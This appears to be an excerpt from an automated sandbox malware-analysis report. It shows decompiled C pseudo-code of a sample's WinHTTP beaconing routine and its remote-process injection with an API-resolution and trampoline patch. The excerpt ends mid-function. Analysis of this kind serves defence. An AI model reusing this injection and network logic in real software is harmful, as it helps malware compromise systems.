      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C72CA
    • WinHttpSetTimeouts.WINHTTP(00000000,00015F90,00015F90,0002BF20,003CD19E,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C72F7
    • WinHttpConnect.WINHTTP(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C7304
    • WinHttpOpenRequest.WINHTTP(00000000,?,003CD19E,00000000,00000000,00000000,00800000,?,?,?,?,?), ref: 003C735E
    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 003C7375
    • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C7385
    • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,0000000C,00000000,?,?,?,?,?), ref: 003C73AA
    • WinHttpQueryDataAvailable.WINHTTP(00000000,00000004,?,?,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C73D8
    • WinHttpReadData.WINHTTP(00000000,00000000,00000004,?,?,?,?,?,?,?,?), ref: 003C7425
      • Part of subcall function 003E1C30: memcpy.MSVCRT ref: 003E1C65
    • WinHttpCloseHandle.WINHTTP(00000000,?,?,00000050,?,?,?,?,?,?,003C43BC,?), ref: 003C74D7
    • WinHttpCloseHandle.WINHTTP(?,?,?,00000050,?,?,?,?,?,?,003C43BC,?), ref: 003C74E5
    • WinHttpCloseHandle.WINHTTP(?,?,?,00000050,?,?,?,?,?,?,003C43BC,?), ref: 003C74F3
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E1820, Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 258string
    C-Code - Quality: 100%
    			E003E1820(void* __ebx, intOrPtr* __ecx, void* _a4, char _a8, char _a10, char _a11, int _a12, char _a16, intOrPtr* _a20) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v44;
				char _v68;
				char _v196;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t88;
				char* _t101;
				int _t105;
				void* _t110;
				char* _t112;
				void* _t114;
				void* _t118;
				void* _t121;
				void* _t124;
				char _t131;
				void* _t132;
				char* _t134;
				void* _t136;
				intOrPtr _t140;
				intOrPtr _t143;
				intOrPtr _t144;
				char* _t147;
				intOrPtr _t149;
				char _t167;
				intOrPtr _t172;
				intOrPtr _t178;
				void* _t180;
				void* _t182;
				intOrPtr* _t183;
				void* _t184;
				void* _t185;
				void* _t187;
				void* _t188;
				void* _t189;

				_t183 = __ecx;
				_v12 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x20))))() == 0) {
					return 0;
				} else {
					_t81 =  *0x3e8628; // 0x622508
					_t180 = _a4;
					_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xc))))(_t180, __ebx);
					_t140 =  *0x3e8628; // 0x622508
					_v8 = _t82;
					_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))(_a8);
					_t131 = _a16;
					if(_t83 + _v8 + _t131 + 0x400 >= 0x400) {
						_t143 =  *0x3e8628; // 0x622508
						_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t143 + 0xc))))(_t180);
						_t144 =  *0x3e8628; // 0x622508
						_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))(_a8) + _t131 + _t85 + 0x400;
					} else {
						_t88 = 0x400;
					}
					_t132 = E003D1D90(_t88, 0);
					_v8 = _t132;
					_t182 = E003D1D90(0x10000, 0);
					_t185 = _t184 + 0x10;
					if(_t182 == 0) {
						L27:
						__eflags = _t132;
						if(_t132 != 0) {
							E003CBB40(_t132);
							_t185 = _t185 + 4;
						}
					} else {
						_t193 = _t132;
						if(_t132 != 0) {
							E003C6CB0( &_v196, 0xd1);
							E003C6CB0( &_v24, 0xd2);
							E003C6CB0( &_v16, 0xd3);
							E003C9090(_t193,  &_v44, 0xd4);
							E003C6CB0( &_v32, 0xd4);
							_t167 = _a8;
							_t187 = _t185 + 0x28;
							if(_t167 != 0) {
								_t147 = 0x3e33e8;
							} else {
								_t167 =  &_v44;
								_t147 = 0x3e33eb;
							}
							_t27 =  &_v24; // 0x3c7471
							_t101 = _t27;
							if(_a12 == 0) {
								_t101 =  &_v16;
							}
							wsprintfA(_t132,  &_v196, _t101, _a4,  *((intOrPtr*)(_t183 + 8)), _t147, _t167);
							E003C6CB0( &_v68, 0xd5);
							_t105 = _a12;
							_t188 = _t187 + 0x24;
							if(_t105 != 0) {
								_t34 =  &_a16; // 0x3c7471
								_t178 =  *0x3e8628; // 0x622508
								memcpy( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x10c))))( *_t34) + _t132, _t132, _t105);
								_t188 = _t188 + 0xc;
							}
							while(1) {
								L14:
								_t149 =  *0x3e8628; // 0x622508
								_v12 = E003D6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
								memset(_t182, 0, 0x10000);
								_t189 = _t188 + 0x18;
								 *(_t183 + 0x14) = 0;
								while(1) {
									L15:
									_t110 = E003D64AC( *((intOrPtr*)(_t183 + 4)), _t182 +  *(_t183 + 0x14), 1);
									_t185 = _t189 + 0xc;
									if(_t110 == 0) {
										goto L27;
									}
									_t112 = strstr(_t182,  &_v32);
									_t188 = _t185 + 8;
									if(_t112 != 0) {
										L19:
										 *(_t183 + 0x18) =  *(_t183 + 0x14);
										_t172 =  *0x3e8628; // 0x622508
										_t114 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x10c))))(_t182);
										__eflags = _t114 - 0xc;
										if(_t114 <= 0xc) {
											L14:
											_t149 =  *0x3e8628; // 0x622508
											_v12 = E003D6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
											memset(_t182, 0, 0x10000);
											_t189 = _t188 + 0x18;
											 *(_t183 + 0x14) = 0;
											continue;
										} else {
											L20:
											_a8 =  *((intOrPtr*)(_t182 + 9));
											_a10 =  *((intOrPtr*)(_t182 + 0xb));
											_a11 = 0;
											 *_a20 = atoi( &_a8);
											_t134 = strstr(_t182,  &_v68);
											_t185 = _t188 + 0xc;
											__eflags = _t134;
											if(_t134 == 0) {
												L26:
												_t132 = _v8;
											} else {
												_t118 = strstr(_t134, 0x3e33e8);
												_t188 = _t185 + 8;
												_a4 = _t118;
												__eflags = _t118;
												if(_t118 == 0) {
													L13:
													_t132 = _v8;
													do {
														goto L14;
													} while (_t114 <= 0xc);
													goto L20;
												} else {
													 *_t118 = 0;
													_t136 = atoi( &(_t134[0x10]));
													_t188 = _t188 + 4;
													 *_a4 = 0xd;
													__eflags = _t136;
													if(_t136 == 0) {
														goto L13;
													} else {
														_t121 = E003D1D90( *(_t183 + 0x14) + _t136 + 2, 0);
														_t185 = _t188 + 8;
														 *(_t183 + 0x10) = _t121;
														__eflags = _t121;
														if(_t121 != 0) {
															memcpy(_t121, _t182,  *(_t183 + 0x14) + 1);
															_t124 = E003D64AC( *((intOrPtr*)(_t183 + 4)),  *(_t183 + 0x10) +  *(_t183 + 0x14) + 1, _t136);
															_t185 = _t185 + 0x18;
															__eflags = _t124;
															if(_t124 != 0) {
																_t71 = _t183 + 0x14;
																 *_t71 =  *(_t183 + 0x14) + _t136 + 1;
																__eflags =  *_t71;
																 *((char*)( *(_t183 + 0x10) +  *(_t183 + 0x14))) = 0;
																_v12 = 1;
															}
														}
														goto L26;
													}
												}
											}
										}
									} else {
										 *(_t183 + 0x14) =  *(_t183 + 0x14) + 1;
										if( *(_t183 + 0x14) < 0x10000) {
											continue;
										} else {
											while(1) {
												L14:
												_t149 =  *0x3e8628; // 0x622508
												_v12 = E003D6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
												memset(_t182, 0, 0x10000);
												_t189 = _t188 + 0x18;
												 *(_t183 + 0x14) = 0;
												goto L15;
											}
										}
										goto L29;
									}
									goto L27;
								}
								goto L27;
							}
						}
					}
					L29:
					__eflags = _t182;
					if(_t182 != 0) {
						E003CBB40(_t182);
					}
					return _v12;
				}
			}












































    0x003e182a
    0x003e1834
    0x003e183b
    0x003e1b2a
    0x003e1841
    0x003e1841
    0x003e1846
    0x003e184e
    0x003e1853
    0x003e185d
    0x003e1860
    0x003e1862
    0x003e1876
    0x003e187f
    0x003e1889
    0x003e188b
    0x003e189d
    0x003e1878
    0x003e1878
    0x003e1878
    0x003e18ac
    0x003e18b5
    0x003e18bd
    0x003e18bf
    0x003e18c4
    0x003e1afd
    0x003e1afd
    0x003e1aff
    0x003e1b02
    0x003e1b07
    0x003e1b07
    0x003e18ca
    0x003e18ca
    0x003e18cc
    0x003e18de
    0x003e18ec
    0x003e18fa
    0x003e1908
    0x003e1916
    0x003e191b
    0x003e191e
    0x003e1923
    0x003e198b
    0x003e1925
    0x003e1925
    0x003e1928
    0x003e1928
    0x003e1931
    0x003e1931
    0x003e1934
    0x003e1936
    0x003e1936
    0x003e194c
    0x003e195b
    0x003e1960
    0x003e1963
    0x003e1968
    0x003e196a
    0x003e196d
    0x003e1981
    0x003e1986
    0x003e1986
    0x003e19a3
    0x003e19a3
    0x003e19a3
    0x003e19c5
    0x003e19c8
    0x003e19cd
    0x003e19d0
    0x003e19d7
    0x003e19d7
    0x003e19e3
    0x003e19e8
    0x003e19ed
    0x00000000
    0x00000000
    0x003e19f8
    0x003e19fe
    0x003e1a03
    0x003e1a13
    0x003e1a16
    0x003e1a19
    0x003e1a26
    0x003e1a28
    0x003e1a2b
    0x003e19a3
    0x003e19a3
    0x003e19c5
    0x003e19c8
    0x003e19cd
    0x003e19d0
    0x00000000
    0x003e1a31
    0x003e1a31
    0x003e1a3c
    0x003e1a40
    0x003e1a43
    0x003e1a55
    0x003e1a5d
    0x003e1a5f
    0x003e1a62
    0x003e1a64
    0x003e1afa
    0x003e1afa
    0x003e1a6a
    0x003e1a70
    0x003e1a76
    0x003e1a79
    0x003e1a7c
    0x003e1a7e
    0x003e19a0
    0x003e19a0
    0x003e19a3
    0x00000000
    0x00000000
    0x00000000
    0x003e1a84
    0x003e1a88
    0x003e1a91
    0x003e1a96
    0x003e1a99
    0x003e1a9c
    0x003e1a9e
    0x00000000
    0x003e1aa4
    0x003e1aae
    0x003e1ab3
    0x003e1ab6
    0x003e1ab9
    0x003e1abb
    0x003e1ac4
    0x003e1ad9
    0x003e1ade
    0x003e1ae1
    0x003e1ae3
    0x003e1ae9
    0x003e1ae9
    0x003e1ae9
    0x003e1aef
    0x003e1af3
    0x003e1af3
    0x003e1ae3
    0x00000000
    0x003e1abb
    0x003e1a9e
    0x003e1a7e
    0x003e1a64
    0x003e1a05
    0x003e1a05
    0x003e1a0f
    0x00000000
    0x003e1a11
    0x003e19a3
    0x003e19a3
    0x003e19a3
    0x003e19c5
    0x003e19c8
    0x003e19cd
    0x003e19d0
    0x00000000
    0x003e19d0
    0x003e19a3
    0x00000000
    0x003e1a0f
    0x00000000
    0x003e1a03
    0x00000000
    0x003e19d7
    0x003e19a3
    0x003e18cc
    0x003e1b0a
    0x003e1b0b
    0x003e1b0d
    0x003e1b10
    0x003e1b15
    0x003e1b20
    0x003e1b20

    APIs
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • wsprintfA.USER32 ref: 003E194C
    • memcpy.MSVCRT ref: 003E1981
    • memset.MSVCRT ref: 003E19C8
    • strstr.MSVCRT ref: 003E19F8
    • atoi.MSVCRT ref: 003E1A47
    • strstr.MSVCRT ref: 003E1A57
    • strstr.MSVCRT ref: 003E1A70
    • atoi.MSVCRT ref: 003E1A8B
    • memcpy.MSVCRT ref: 003E1AC4
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CDFB0, Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 434library
    C-Code - Quality: 91%
    			E003CDFB0(void* __ecx, struct HINSTANCE__* _a4, _Unknown_base(*)()* _a8) {
				int _v8;
				intOrPtr _v12;
				short _v14;
				int _v18;
				char _v20;
				intOrPtr _v52;
				intOrPtr _v88;
				intOrPtr _v92;
				_Unknown_base(*)()* _v96;
				_Unknown_base(*)()* _v100;
				_Unknown_base(*)()* _v104;
				_Unknown_base(*)()* _v108;
				_Unknown_base(*)()* _v112;
				_Unknown_base(*)()* _v116;
				_Unknown_base(*)()* _v120;
				_Unknown_base(*)()* _v124;
				char _v128;
				_Unknown_base(*)()* _v132;
				void _v136;
				char _v236;
				char _v436;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr _t135;
				_Unknown_base(*)()* _t137;
				intOrPtr _t138;
				_Unknown_base(*)()* _t141;
				_Unknown_base(*)()* _t148;
				intOrPtr _t150;
				intOrPtr _t152;
				_Unknown_base(*)()* _t153;
				intOrPtr _t156;
				intOrPtr _t160;
				intOrPtr _t164;
				intOrPtr _t168;
				_Unknown_base(*)()* _t171;
				intOrPtr _t172;
				_Unknown_base(*)()* _t175;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t207;
				_Unknown_base(*)()* _t208;
				_Unknown_base(*)()* _t209;
				_Unknown_base(*)()* _t211;
				_Unknown_base(*)()* _t217;
				_Unknown_base(*)()* _t218;
				_Unknown_base(*)()* _t222;
				_Unknown_base(*)()* _t224;
				intOrPtr _t226;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t264;
				intOrPtr _t265;
				intOrPtr _t272;
				intOrPtr _t276;
				intOrPtr _t277;
				intOrPtr _t278;
				intOrPtr _t291;
				void* _t306;
				struct HINSTANCE__* _t307;
				void* _t310;

				_t222 = 0;
				_t310 = __ecx;
				_v8 = 0;
				if( *((intOrPtr*)(__ecx + 0x6c)) == 0) {
					memset( &_v136, 0, 0x70);
					_t226 =  *0x3e8628; // 0x622508
					_t133 =  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x88))))(0, 0, 0, 0, _t306);
					 *((intOrPtr*)(_t310 + 0x80)) = _t133;
					_t134 =  *0x3e8628; // 0x622508
					_t135 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x88))))(0, 0, 0, 0);
					 *((intOrPtr*)(_t310 + 0x84)) = _t135;
					_t272 =  *0x3e8628; // 0x622508
					_t137 =  *((intOrPtr*)( *((intOrPtr*)(_t272 + 0x88))))(0, 1, 1, 0);
					_t307 = _a4;
					 *((intOrPtr*)(_t310 + 0x60)) = _a8;
					 *(_t310 + 0x88) = _t137;
					 *((intOrPtr*)(_t310 + 0x5c)) = _t307;
					_t138 =  *0x3e8628; // 0x622508
					_t14 = _t138 + 0x8c; // 0x622594
					_a4 = _t14;
					_t18 = _t310 + 0x80; // 0x828b003e
					_t141 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 0x100))))( *_t18, _t307,  &_v136, 0, 0, 2));
					__eflags = _t141;
					if(_t141 == 0) {
						L21:
						_t98 = _t310 + 0x80; // 0x828b003e
						_t276 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t276 + 0xf8))))( *_t98);
						_t100 = _t310 + 0x84; // 0xc8
						_t277 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0xf8))))( *_t100);
						_t102 = _t310 + 0x88; // 0x3e868
						_t278 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t278 + 0xf8))))( *_t102);
						__eflags = _v136;
						if(_v136 != 0) {
							_t164 =  *0x3e8628; // 0x622508
							_t106 = _t164 + 0x8c; // 0x622594
							_a4 = _t106;
							 *(_a4->i)(_t307, _v136,  *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x100))))(0, 0, 0, 3));
						}
						__eflags = _v132;
						if(_v132 != 0) {
							_t160 =  *0x3e8628; // 0x622508
							_t112 = _t160 + 0x8c; // 0x622594
							_a4 = _t112;
							 *(_a4->i)(_t307, _v132,  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x100))))(0, 0, 0, 3));
						}
						__eflags =  *(_t310 + 0x88);
						if( *(_t310 + 0x88) != 0) {
							_t156 =  *0x3e8628; // 0x622508
							_t118 = _t156 + 0x8c; // 0x622594
							_a4 = _t118;
							 *(_a4->i)(_t307, _v128,  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x100))))(0, 0, 0, 3));
						}
						__eflags = _t222;
						if(_t222 != 0) {
							_t152 =  *0x3e8628; // 0x622508
							_t153 = _t152 + 0x6c;
							__eflags = _t153;
							_a8 = _t153;
							 *( *_a8)(_t307, _t222, E003CEA80(), 0x8000);
						}
						_t148 = _v8;
						__eflags = _t148;
						if(_t148 != 0) {
							_t150 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x6c))))(_t307, _t148, 0x70, 0x8000);
						}
						__eflags = 0;
						 *(_t310 + 0x8c) = 0;
						 *(_t310 + 0x90) = 0;
						 *((intOrPtr*)(_t310 + 0x80)) = 0;
						 *((intOrPtr*)(_t310 + 0x84)) = 0;
						 *(_t310 + 0x88) = 0;
						return 0;
					} else {
						_t168 =  *0x3e8628; // 0x622508
						_t20 = _t168 + 0x8c; // 0x622594
						_a4 = _t20;
						_t24 = _t310 + 0x84; // 0xc8
						_t171 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t168 + 0x100))))( *_t24, _t307,  &_v132, 0, 0, 2));
						__eflags = _t171;
						if(_t171 == 0) {
							goto L21;
						} else {
							_t172 =  *0x3e8628; // 0x622508
							_t26 = _t172 + 0x8c; // 0x622594
							_a4 = _t26;
							_t30 = _t310 + 0x88; // 0x3e868
							_t175 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x100))))( *_t30, _t307,  &_v128, 0, 0, 2));
							__eflags = _t175;
							if(_t175 == 0) {
								goto L21;
							} else {
								_push(0x40);
								_push(0x3000);
								_t176 = E003CEA80();
								_push(_t176);
								_push(0);
								_push(_t307);
								E003D1E80();
								_t222 = _t176;
								__eflags = _t222;
								if(_t222 == 0) {
									goto L21;
								} else {
									__eflags = E003C7B30(_t310, _t307, _t222, E003CE8B0, E003CEA80());
									if(__eflags == 0) {
										goto L21;
									} else {
										_v92 = 0;
										_v88 = 0;
										_v52 = 0;
										E003C9090(__eflags,  &_v436, 0x6c);
										_t291 =  *0x3e8628; // 0x622508
										_a4 =  *((intOrPtr*)( *((intOrPtr*)(_t291 + 0x24))))( &_v436);
										E003C6CB0( &_v236, 0x90);
										_v124 = GetProcAddress(_a4,  &_v236);
										E003C6CB0( &_v236, 0x91);
										_v120 = GetProcAddress(_a4,  &_v236);
										E003C6CB0( &_v236, 0x92);
										_v116 = GetProcAddress(_a4,  &_v236);
										E003C6CB0( &_v236, 0x93);
										_v112 = GetProcAddress(_a4,  &_v236);
										E003C6CB0( &_v236, 0x94);
										_v108 = GetProcAddress(_a4,  &_v236);
										E003C6CB0( &_v236, 0xbf);
										_v96 = GetProcAddress(_a4,  &_v236);
										E003C6CB0( &_v236, 0xc0);
										_v104 = GetProcAddress(_a4,  &_v236);
										E003C6CB0( &_v236, 0xc1);
										_t207 = GetProcAddress(_a4,  &_v236);
										__eflags = _v124;
										_v100 = _t207;
										if(_v124 == 0) {
											goto L21;
										} else {
											__eflags = _v120;
											if(_v120 == 0) {
												goto L21;
											} else {
												__eflags = _v116;
												if(_v116 == 0) {
													goto L21;
												} else {
													__eflags = _v112;
													if(_v112 == 0) {
														goto L21;
													} else {
														_push(0x40);
														_push(0x3000);
														_push(0x70);
														_push(0);
														_push(_t307);
														E003D1E80();
														_v8 = _t207;
														__eflags = _t207;
														if(_t207 == 0) {
															goto L21;
														} else {
															_t208 = E003C7B30(_t310, _t307, _t207,  &_v136, 0x70);
															__eflags = _t208;
															if(_t208 == 0) {
																goto L21;
															} else {
																_t209 = E003C6740(_t310, _t307);
																__eflags = _t209;
																if(_t209 == 0) {
																	goto L21;
																} else {
																	__eflags =  *(_t310 + 0x68);
																	if( *(_t310 + 0x68) == 0) {
																		_t262 =  *0x3e8628; // 0x622508
																		_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x64))))(_t307, 0, 0, _t222, _v8, 4, 0);
																		_a8 = _t211;
																	} else {
																		_v18 = _v8;
																		_v12 = _t222 - _t209 - 0xc;
																		_v20 = 0x6858;
																		_v14 = 0xe950;
																		_t211 = E003C7B30(_t310, _t307, _t209,  &_v20, 0xc);
																	}
																	__eflags = _t211;
																	if(_t211 == 0) {
																		goto L21;
																	} else {
																		_t87 = _t310 + 0x84; // 0xc8
																		_t263 =  *0x3e8628; // 0x622508
																		 *((intOrPtr*)( *((intOrPtr*)(_t263 + 0x80))))( *_t87);
																		_t89 = _t310 + 0x80; // 0x828b003e
																		_t264 =  *0x3e8628; // 0x622508
																		 *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x80))))( *_t89);
																		_t265 =  *0x3e8628; // 0x622508
																		_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0x94))))(_a8);
																		__eflags = _t217;
																		if(_t217 == 0) {
																			goto L21;
																		} else {
																			_t218 = E003CE730(_t310);
																			__eflags = _t218;
																			if(_t218 == 0) {
																				goto L21;
																			} else {
																				 *(_t310 + 0x90) = _t222;
																				 *(_t310 + 0x8c) = _v8;
																				_t224 = _t222 - E003CE8B0 + E003CEA20;
																				__eflags = _t224;
																				 *(_t310 + 0x94) = _t224;
																				 *((intOrPtr*)(_t310 + 0x6c)) = 1;
																				return 1;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					return 0;
				}
			}































































    0x003cdfbb
    0x003cdfbd
    0x003cdfbf
    0x003cdfc5
    0x003cdfdc
    0x003cdfe1
    0x003cdff4
    0x003cdff8
    0x003cdffe
    0x003ce00b
    0x003ce010
    0x003ce016
    0x003ce025
    0x003ce027
    0x003ce031
    0x003ce034
    0x003ce03a
    0x003ce03d
    0x003ce044
    0x003ce057
    0x003ce05a
    0x003ce06a
    0x003ce06c
    0x003ce06e
    0x003ce3d2
    0x003ce3d2
    0x003ce3d8
    0x003ce3e5
    0x003ce3e7
    0x003ce3ed
    0x003ce3fa
    0x003ce3fc
    0x003ce402
    0x003ce40f
    0x003ce411
    0x003ce418
    0x003ce41a
    0x003ce42b
    0x003ce433
    0x003ce446
    0x003ce446
    0x003ce448
    0x003ce44c
    0x003ce44e
    0x003ce45f
    0x003ce467
    0x003ce477
    0x003ce477
    0x003ce479
    0x003ce480
    0x003ce482
    0x003ce493
    0x003ce49b
    0x003ce4ab
    0x003ce4ab
    0x003ce4ad
    0x003ce4af
    0x003ce4b1
    0x003ce4b6
    0x003ce4b6
    0x003ce4be
    0x003ce4ce
    0x003ce4ce
    0x003ce4d0
    0x003ce4d3
    0x003ce4d5
    0x003ce4df
    0x003ce4e8
    0x003ce4e8
    0x003ce4ea
    0x003ce4ed
    0x003ce4f3
    0x003ce4f9
    0x003ce4ff
    0x003ce505
    0x003ce510
    0x003ce074
    0x003ce074
    0x003ce07f
    0x003ce08f
    0x003ce092
    0x003ce0a2
    0x003ce0a4
    0x003ce0a6
    0x00000000
    0x003ce0ac
    0x003ce0ac
    0x003ce0b7
    0x003ce0c7
    0x003ce0ca
    0x003ce0da
    0x003ce0dc
    0x003ce0de
    0x00000000
    0x003ce0e4
    0x003ce0e4
    0x003ce0e6
    0x003ce0eb
    0x003ce0f0
    0x003ce0f1
    0x003ce0f3
    0x003ce0f6
    0x003ce0fb
    0x003ce0fd
    0x003ce0ff
    0x00000000
    0x003ce105
    0x003ce119
    0x003ce11b
    0x00000000
    0x003ce121
    0x003ce123
    0x003ce126
    0x003ce129
    0x003ce135
    0x003ce13a
    0x003ce15b
    0x003ce15e
    0x003ce183
    0x003ce186
    0x003ce1ab
    0x003ce1ae
    0x003ce1d3
    0x003ce1d6
    0x003ce1fb
    0x003ce1fe
    0x003ce223
    0x003ce226
    0x003ce23f
    0x003ce24e
    0x003ce273
    0x003ce276
    0x003ce289
    0x003ce28f
    0x003ce293
    0x003ce296
    0x00000000
    0x003ce29c
    0x003ce29c
    0x003ce2a0
    0x00000000
    0x003ce2a6
    0x003ce2a6
    0x003ce2aa
    0x00000000
    0x003ce2b0
    0x003ce2b0
    0x003ce2b4
    0x00000000
    0x003ce2ba
    0x003ce2ba
    0x003ce2bc
    0x003ce2c1
    0x003ce2c3
    0x003ce2c5
    0x003ce2c8
    0x003ce2cd
    0x003ce2d0
    0x003ce2d2
    0x00000000
    0x003ce2d8
    0x003ce2e5
    0x003ce2ea
    0x003ce2ec
    0x00000000
    0x003ce2f2
    0x003ce2f5
    0x003ce2fa
    0x003ce2fc
    0x00000000
    0x003ce302
    0x003ce302
    0x003ce306
    0x003ce338
    0x003ce34c
    0x003ce34e
    0x003ce308
    0x003ce30d
    0x003ce31c
    0x003ce322
    0x003ce328
    0x003ce32e
    0x003ce32e
    0x003ce351
    0x003ce353
    0x00000000
    0x003ce355
    0x003ce355
    0x003ce35b
    0x003ce368
    0x003ce36a
    0x003ce370
    0x003ce37d
    0x003ce382
    0x003ce38f
    0x003ce391
    0x003ce393
    0x00000000
    0x003ce395
    0x003ce397
    0x003ce39c
    0x003ce39e
    0x00000000
    0x003ce3a0
    0x003ce3a3
    0x003ce3af
    0x003ce3b5
    0x003ce3b5
    0x003ce3c1
    0x003ce3c7
    0x003ce3cf
    0x003ce3cf
    0x003ce39e
    0x003ce393
    0x003ce353
    0x003ce2fc
    0x003ce2ec
    0x003ce2d2
    0x003ce2b4
    0x003ce2aa
    0x003ce2a0
    0x003ce296
    0x003ce11b
    0x003ce0ff
    0x003ce0de
    0x003ce0a6
    0x003cdfc8
    0x003cdfce
    0x003cdfce

    APIs
    • memset.MSVCRT ref: 003CDFDC
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE171
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE199
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE1C1
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE1E9
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE211
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE239
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE261
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE289
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D4BDF, Relevance: 19.7, APIs: 8, Strings: 5, Instructions: 174string
    C-Code - Quality: 76%
    			E003D4BDF(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _v68;
				void _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t53;
				intOrPtr* _t55;
				void* _t57;
				void* _t62;
				void* _t77;
				void* _t78;
				intOrPtr _t82;
				void* _t90;
				intOrPtr _t106;
				int _t111;
				char* _t112;
				intOrPtr _t113;
				void* _t118;
				void* _t119;
				void* _t120;
